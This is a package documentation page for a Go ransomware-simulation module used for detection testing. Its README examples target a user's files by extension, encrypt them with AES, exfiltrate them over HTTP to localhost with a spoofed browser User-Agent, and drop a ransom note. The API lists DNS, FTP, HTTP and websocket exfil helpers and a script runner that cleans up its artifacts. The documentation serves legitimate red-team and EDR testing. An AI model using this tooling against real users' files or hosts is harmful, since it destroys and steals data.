ransimware

package module
v0.27.2
Published: Apr 17, 2024 License: GPL-3.0 Imports: 31 Imported by: 0

README

Ransimware

What is this?

This Go module allows you to simulate ransomware. Use https://ransomlook.io for ideas on domains and IOCs.

How to install

Open a terminal and run the following:

$ go get --ldflags "-s -w" --trimpath -u \
    github.com/mjwhitta/ransimware

Usage

Minimal example:

package main

import (
    "os"
    "path/filepath"

    rw "github.com/mjwhitta/ransimware"
)

func main() {
    var e error
    var home string
    var sim *rw.Simulator

    // Try to get home directory
    if home, e = os.UserHomeDir(); e != nil {
        panic(e)
    }

    // Create simulator with 32 worker threads
    sim = rw.New(32)

    // Since no encrypt function is defined, the default behavior is
    // to do nothing

    // Since no exfil function is defined, the default behavior is to
    // do nothing

    // Since no notify function is defined, the default behavior is to
    // do nothing

    // Target the user's Desktop directory
    if e = sim.Target(filepath.Join(home, "Desktop")); e != nil {
        panic(e)
    }

    // Run the simulator
    if e = sim.Run(); e != nil {
        panic(e)
    }
}

More complex example:

package main

import (
    "os"
    "path/filepath"
    "strings"

    rw "github.com/mjwhitta/ransimware"
)

func main() {
    var e error
    var home string
    var sim *rw.Simulator

    // Try to get home directory
    if home, e = os.UserHomeDir(); e != nil {
        panic(e)
    }

    // Create simulator with 32 worker threads
    sim = rw.New(32)

    // Include interesting extensions
    sim.Include(`\.(avi|mkv|mov|mp[34]|mpeg4?|ogg|wav)$`) // vids
    sim.Include(`\.(bmp|gif|ico|jpe?g|png|tiff)$`)        // imgs
    sim.Include(`\.(docx|pptx|txt|xlsx|zip)$`)            // docs
    sim.Include(`\.(bat|ps1|xml)$`)                       // misc

    // Ignore directories
    sim.Exclude(`All\sUsers|AppData.Local|cache2.entries|Games`)
    sim.Exclude(
        `Local\sSettings|Low.Content\.IE5|Program(Data|\sFiles)`,
    )
    sim.Exclude(`Tor\sBrowser|User\sData.Default.Cache|Windows`)

    // Ignore AnyConnect cache/config
    sim.Exclude(`\.cisco|Cisco`)

    // Ignore extensions
    sim.Exclude(`\.(bin|dll|exe|in[fi]|lnk|ransimware|sys)$`)

    // Set encryption method to AES using provided helper function
    sim.Encrypt = rw.AESEncrypt("password")

    // Set exfil method to be HTTP using provided helper function
    sim.Exfil, e = rw.HTTPExfil(
        "http://localhost:8080",
        map[string]string{
            "User-Agent": strings.Join(
                []string{
                    "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
                    "AppleWebKit/537.36 (KHTML, like Gecko)",
                    "Chrome/84.0.4147.105 Safari/537.36",
                },
                " ",
            ),
        },
    )
    if e != nil {
        panic(e)
    }

    // Notify user by changing wallpaper and leaving a ransom note,
    // using the provided helper functions; propagate any error so
    // that Run() reports a failed notification
    sim.Notify = func() error {
        var err error

        err = rw.RansomNote(
            filepath.Join(home, "Desktop", "ransomnote.txt"),
            "This is a ransomware simulation.",
        )()
        if err != nil {
            return err
        }

        return rw.WallpaperNotify(
            filepath.Join(home, "Desktop", "ransom.png"),
            rw.DefaultPNG,
            rw.DesktopStretch,
            false,
        )()
    }

    // Target the user's home directory
    if e = sim.Target(home); e != nil {
        panic(e)
    }

    // Run the simulator
    if e = sim.Run(); e != nil {
        panic(e)
    }
}
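An added example, not code from the README or the ransimware project: a custom exfil hook written in the package's ExfilFunc shape that keeps every byte on the host and only records a path-to-SHA-256 manifest, so a detection-engineering run can be checked against EDR/DLP telemetry without any data leaving the machine. It assumes the hook would be wired up as sim.Exfil = m.Exfil; the sample files are constructed.

```go
package main

import (
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"sync"
)

// Manifest is an inert exfil sink: nothing leaves the host, but the hex SHA-256 of every
// file handed over is logged by path. The mutex matters: rw.New(32) runs 32 worker goroutines.
type Manifest struct {
	mu   sync.Mutex
	seen map[string]string
}

// Exfil has the package's ExfilFunc shape, func(fn string, b []byte) error, so
// with the real package it would be wired up as sim.Exfil = m.Exfil (assumed).
func (m *Manifest) Exfil(fn string, b []byte) error {
	if fn == "" {
		return fmt.Errorf("manifest exfil: empty path")
	}
	sum := sha256.Sum256(b)
	m.mu.Lock()
	defer m.mu.Unlock()
	if m.seen == nil {
		m.seen = map[string]string{}
	}
	m.seen[fn] = hex.EncodeToString(sum[:])
	return nil
}

// Entries returns the path -> SHA-256 log; read it after sim.Run() and diff it against EDR/DLP telemetry.
func (m *Manifest) Entries() map[string]string {
	m.mu.Lock()
	defer m.mu.Unlock()
	return m.seen
}

func main() { // constructed sample files, one goroutine each, like the worker pool
	var m Manifest
	var wg sync.WaitGroup
	for p, d := range map[string][]byte{"b.txt": []byte("world"), "a.txt": []byte("hello")} {
		wg.Add(1)
		go func(p string, d []byte) { defer wg.Done(); _ = m.Exfil(p, d) }(p, d)
	}
	wg.Wait()
	fmt.Println(m.Entries())
}
```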

TODO

  • Provide more helper functions
    • FTP exfil

Documentation

Constants

const (
	DesktopCenter  string = "0"
	DesktopFill    string = "10"
	DesktopFit     string = "6"
	DesktopSpan    string = "22"
	DesktopStretch string = "2"
	DesktopTile    string = "0"
)

Desktop wallpaper style consts

const Version string = "0.27.2"

Version is the package version

Variables

var DefaultEncrypt = func(path string, b []byte) ([]byte, error) {
	return b, nil
}

DefaultEncrypt is the default encryption behavior.

var DefaultExfil = func(path string, b []byte) error {
	return nil
}

DefaultExfil is the default exfil behavior.

var DefaultNotify = func() error {
	return nil
}

DefaultNotify is the default notify behavior.

var DefaultPNG []byte

DefaultPNG is an example PNG for use with WallpaperNotify().

Functions

func Base64Encode

func Base64Encode(path string, b []byte) ([]byte, error)

Base64Encode will "encrypt" using base64, obvs.

func ExecuteScript

func ExecuteScript(
	method string,
	clean bool,
	cmds ...string,
) (string, error)

ExecuteScript will run shell commands using the provided method, as well as attempt to clean up artifacts, if requested.

Types

type EncryptFunc

type EncryptFunc func(fn string, b []byte) ([]byte, error)

EncryptFunc defines a function pointer that can be used to encrypt file contents before exfil.

func AESDecrypt

func AESDecrypt(passwd string) EncryptFunc

AESDecrypt will return a function pointer to an EncryptFunc that actually decrypts using the specified password.

func AESEncrypt

func AESEncrypt(passwd string) EncryptFunc

AESEncrypt will return a function pointer to an EncryptFunc that uses the specified password.

func RSADecrypt

func RSADecrypt(priv *rsa.PrivateKey) EncryptFunc

RSADecrypt will return a function pointer to an EncryptFunc that actually decrypts using the specified private key. The private key is used to decrypt an OTP used with AES for a hybrid RSA+AES scheme.

func RSAEncrypt

func RSAEncrypt(pub *rsa.PublicKey) EncryptFunc

RSAEncrypt will return a function pointer to an EncryptFunc that uses the specified public key. The public key is used to encrypt an OTP used with AES for a hybrid RSA+AES scheme.

type ExfilFunc

type ExfilFunc func(fn string, b []byte) error

ExfilFunc defines a function pointer that can be used to exfil file contents.

func DNSResolvedExfil

func DNSResolvedExfil(domain string) (ExfilFunc, error)

DNSResolvedExfil will return a function pointer to an ExfilFunc that exfils by sending DNS queries to the authoritative nameserver for the specified domain.

func FTPExfil

func FTPExfil(dst, user, passwd string) (ExfilFunc, error)

FTPExfil will return a function pointer to an ExfilFunc that exfils via an FTP connection.

func FTPParallelExfil

func FTPParallelExfil(dst, user, passwd string) (ExfilFunc, error)

FTPParallelExfil will return a function pointer to an ExfilFunc that exfils via multiple FTP connections.

func HTTPExfil

func HTTPExfil(
	dst string,
	headers map[string]string,
) (ExfilFunc, error)

HTTPExfil will return a function pointer to an ExfilFunc that exfils via HTTP POST requests with the specified headers.

func WebsocketExfil

func WebsocketExfil(
	dst string,
	headers map[string]string,
	proxy ...string,
) (ExfilFunc, error)

WebsocketExfil will return a function pointer to an ExfilFunc that exfils via a websocket connection.

func WebsocketParallelExfil

func WebsocketParallelExfil(
	dst string,
	headers map[string]string,
	proxy ...string,
) (ExfilFunc, error)

WebsocketParallelExfil will return a function pointer to an ExfilFunc that exfils via multiple websocket connections.

type NotifyFunc

type NotifyFunc func() error

NotifyFunc defines a function pointer that can be used to notify the user of the ransom.

func RansomNote

func RansomNote(path string, text ...string) NotifyFunc

RansomNote will return a function pointer to a NotifyFunc that appends the specified text to the specified file.

func WallpaperNotify

func WallpaperNotify(
	img string,
	png []byte,
	fit string,
	clean bool,
) NotifyFunc

WallpaperNotify is a NotifyFunc that sets the background wallpaper.

type Simulator

type Simulator struct {
	Encrypt func(fn string, b []byte) ([]byte, error)

	Exfil          func(fn string, b []byte) error
	ExfilFilenames bool
	ExfilThreshold uint64

	MaxFileSize int64
	Notify      func() error
	OTP         [32]byte

	Threads   int
	WaitEvery time.Duration
	WaitFor   time.Duration
	// contains filtered or unexported fields
}

Simulator is a struct containing all simulation metadata.

func New

func New(threads int) *Simulator

New will return a pointer to a new Simulator instance.

func (*Simulator) Exclude

func (s *Simulator) Exclude(pattern string) error

Exclude will add the specified pattern to the do-not-target list.

func (*Simulator) Include

func (s *Simulator) Include(pattern string) error

Include will add the specified pattern to the target list.

func (*Simulator) Run

func (s *Simulator) Run() error

Run will start the simulator.

func (*Simulator) Target

func (s *Simulator) Target(path string) error

Target will add a path to the simulator.

Directories

Path Synopsis
cmd
tools